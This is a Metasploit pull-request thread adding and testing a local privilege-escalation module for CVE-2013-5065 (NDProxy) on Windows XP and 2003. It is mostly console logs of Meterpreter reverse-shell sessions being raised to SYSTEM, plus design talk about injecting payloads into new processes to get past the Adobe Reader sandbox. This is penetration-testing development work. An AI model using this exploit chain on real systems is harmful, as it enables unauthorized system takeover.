Add module for CVE-2013-5065

[jvazquez-r7]

Tested on Windows XP SP3 and Windows 2003 SP2 successfully.

Verification

• Install Windows XP SP3 or Windows 2003 SP2
• Enable the "Routing and Remote Access"
• Get a meterpreter session on the target system (just use msfpayload to create a meterpreter payload embedded into an exe)
• Run the local exploit like on the DEMO
• Hopefully enjoy a new SYSTEM session (verify with getuid)

DEMO

• Win XP SP3

msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1025) at 2013-12-11 08:57:34 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > check
re[*] The target appears to be vulnerable.
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (769024 bytes) to 10.6.0.165
[+] Enjoy
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50716) at 2013-12-11 08:58:05 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms_ndproxy) > 

• Win 2003 SP2

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.136:1031) at 2013-12-11 08:58:42 -0600

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 3...
msf exploit(ms_ndproxy) > set session 3
session => 3
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Detecting the target system...
[*] Running against Windows Server 2003 SP2
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (769024 bytes) to 192.168.172.136
[+] Enjoy
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.136:1032) at 2013-12-11 08:59:57 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

[Meatballs1]

http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html

Another one for the list

[jvazquez-r7]

agree, interesting one to add to the list, ok, let me make a commit :)

[OJ]

I don't have a Win2k3 SP2 box (yet), but WinXP SP3 looks good for me:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.5.26.40:8000 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.5.26.45
[*] Meterpreter session 1 opened (10.5.26.40:8000 -> 10.5.26.45:1047) at 2013-12-12 09:56:02 +1000

meterpreter > sysinfo
Computer        : OJ-75E3B8CC9475
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: OJ-75E3B8CC9475\bob
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > check
[*] The target appears to be vulnerable.
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 10.5.26.40:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (769024 bytes) to 10.5.26.45
[+] Enjoy
[*] Meterpreter session 2 opened (10.5.26.40:4444 -> 10.5.26.45:1048) at 2013-12-12 09:56:58 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

[OJ]

I know this isn't supported on Windows XP SP2, but I thought I'd run the check function to see if it behaved, and I got this:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.5.26.40:8000 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.5.26.59
[*] Meterpreter session 3 opened (10.5.26.40:8000 -> 10.5.26.59:1025) at 2013-12-12 10:01:00 +1000

meterpreter > sysinfo
Computer        : OJ-DFE0B6FE1959
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: OJ-DFE0B6FE1959\bob
meterpreter > background
[*] Backgrounding session 3...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set session 3
session => 3
msf exploit(ms_ndproxy) > check
[-] Exploit check failed: Msf::Exploit::Failed \\.\NDProxy device not found
[-] Call stack:
[-]   /home/oj/code/metasploit-framework/lib/msf/core/exploit.rb:1197:in `fail_with'
[-]   /home/oj/code/metasploit-framework/modules/exploits/windows/local/ms_ndproxy.rb:297:in `check'

Am I right in thinking that we shouldn't see a failure like this with a call stack, but instead a message saying the system isn't vulnerable?

[OJ]

To avoid the callstack dump, would it be better to just return Exploit::CheckCode::Safe ?

[Meatballs1]

Isn't there a CheckCode::NoTarget or something for unsupported OSs etc?

[jvazquez-r7]

Agree my fault, for fail_with inside check, copy and paste side effects :\

[OJ]

I enabled the "Routing and Remote Access" service on my Windows XP SP2 machine, and the check function now passes. However, running the exploit BSODs the box :)

msf exploit(ms_ndproxy) > check
[*] The target appears to be vulnerable.
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 10.5.26.40:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] 10.5.26.59 - Meterpreter session 3 closed.  Reason: Died

Maybe we should filter out SP2?

Quick check of Win7:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.5.26.40:8000 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.5.26.40
[*] Meterpreter session 5 opened (10.5.26.40:8000 -> 10.5.26.40:41129) at 2013-12-12 10:23:37 +1000

meterpreter > sysinfo
Computer        : WIN-KM66F94HDLL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-KM66F94HDLL\OJ
meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set session 5
session => 5
msf exploit(ms_ndproxy) > check
[*] The target is not exploitable.

Looks good.

Just FYI, yo!

[jvazquez-r7]

Honestly, didn't check XP SP2, but having into account the BSOD, looks like still it's using the use input data to access memory without bound checkings, and maybe still doing a dangerous call... maybe this time isn't just a 0x38 :) I can return a Detected CheckCode in case of XP < SP3. Will fix tomorrow morning :) thans @OJ for testing!

[Meatballs1]

Isn't this just executing the shellcode in the current process? Which seems a bit pointless if we have already elevated the current process?

Ideally it should: start a new process, elevate that process and execute shellcode - leaving the current process intact.
Or if we cant do that: elevate current process but execute new shellcode in a new process?
Or: just elevate the current process but dont bother executing shellcode (although this breaks away from the Metasploit 'exploit' definition it is like getsystem).

[jvazquez-r7]

@OJ and @Meatballs1 , ok, I'm going to use this solution:

Or if we cant do that: elevate current process but execute new shellcode in a new process?

The original exploit purpose was get SYSTEM on XP systems after an Adobe sandboxed renderer exploitation, according to "http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html":

Any code in the recent versions of Adobe Reader renderer will be sandboxed and enforced by a policy. This means that even after a successful exploitation of the renderer, the injected code will be contained and the attacker’s shellcode will run under limited privileges (e.g. one can’t launch a new process using the shellcode). 

So to avoid Adobe Reader sandbox from stop the exploitation, I'm going to elevate the current process, and execute the payload in new one :) Hope this approach makes all comfortable :) work in progress...

[zeroSteiner]

@jvazquez-r7 if you call execute_shellcode and specify a PID argument it will cause the meterpreter session to crash when CreateThread is called. I've opened a PR #2750 to fix the issue but you will run into it if you change this exploit to inject into another process using execute_shellcode. Hope this heads up saves you debugging time.

[jvazquez-r7]

@zeroSteiner thanks, let me fix it on this pull request, by favoring the usage of Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread over railgun :) (code stolen from old @Meatballs1's code indeed). If there is any reason to favor Railgun let me know, please, and I can revert :)

[OJ]

Suits me :)

[wchen-r7]

I hit the following error when I use the run command from the meterpreter prompt. Something is broken:

meterpreter > run exploit/windows/local/ms_ndproxy 
[-] Error in script: NoMethodError undefined method `run_simple' for #<Msf::Modules::Mod6578706c6f69742f77696e646f77732f6c6f63616c2f6d735f6e6470726f7879::Metasploit3:0x007fcb01d81430>

[wchen-r7]

However, if I run it from the msf prompt, it works fine:

msf exploit(ms_ndproxy) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[*] Injecting 290 bytes into 128 memory and executing it...
[*] Sending stage (769024 bytes) to 10.0.1.76
[+] Enjoy
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:52737) at 2013-12-13 14:35:51 -0600

meterpreter > 

[jvazquez-r7]

mmmm lemme dig a little into the run_simple, I hope it isn't related to the module but lemme repro!!!

[wchen-r7]

It doesn't look like it's from your module, but something is broken indeed:

[12/13/2013 14:36:41] [d(0)] core: Callstack: /rapid7/msf/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:555:in `cmd_run'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
/rapid7/msf/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
/rapid7/msf/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
/rapid7/msf/lib/rex/ui/text/shell.rb:190:in `call'
/rapid7/msf/lib/rex/ui/text/shell.rb:190:in `run'
/rapid7/msf/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
/rapid7/msf/lib/msf/base/sessions/meterpreter.rb:428:in `_interact'
/rapid7/msf/lib/rex/ui/interactive.rb:49:in `interact'
/rapid7/msf/lib/msf/ui/console/command_dispatcher/core.rb:1744:in `cmd_sessions'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
/rapid7/msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
/rapid7/msf/lib/rex/ui/text/shell.rb:200:in `run'
/rapid7/msf/msfconsole:148:in `<main>'

[jvazquez-r7]

@wchen-r7 ooom absolutely, looks like cmd_run is trying to run run_simple on the module:

        opts = (args + [ "SESSION=#{client.sid}" ]).join(',')
        reloaded_mod.run_simple(
          #'RunAsJob' => true,
          'LocalInput'  => shell.input,
          'LocalOutput' => shell.output,
          'OptionStr'   => opts
        )

but only Post and Auxiliary define run_simple, while Local Exploits come from Exploit... so I guess local exploits can't be run through the run meterpreter command. I wasn't aware. Not sure if @jlee-r7 / others were aware of the thing. If there is something I should do in this pull request, feedback is super welcome!

[jvazquez-r7]

Also if you would like me to fill a bug or something else, please, let me know! nice catch!

[wchen-r7]

Yeah, looks like something we overlooked with the "run" command. So that means the run command won't work against all local exploits, either. Definitely a missing feature, but not caused by the module, so I'll go ahead and push this in. Thanks.

[wchen-r7]

Ticket for the above issue:
http://dev.metasploit.com/redmine/issues/8715

[jvazquez-r7]

coolio, thanks! Now time for me to handle #2758 !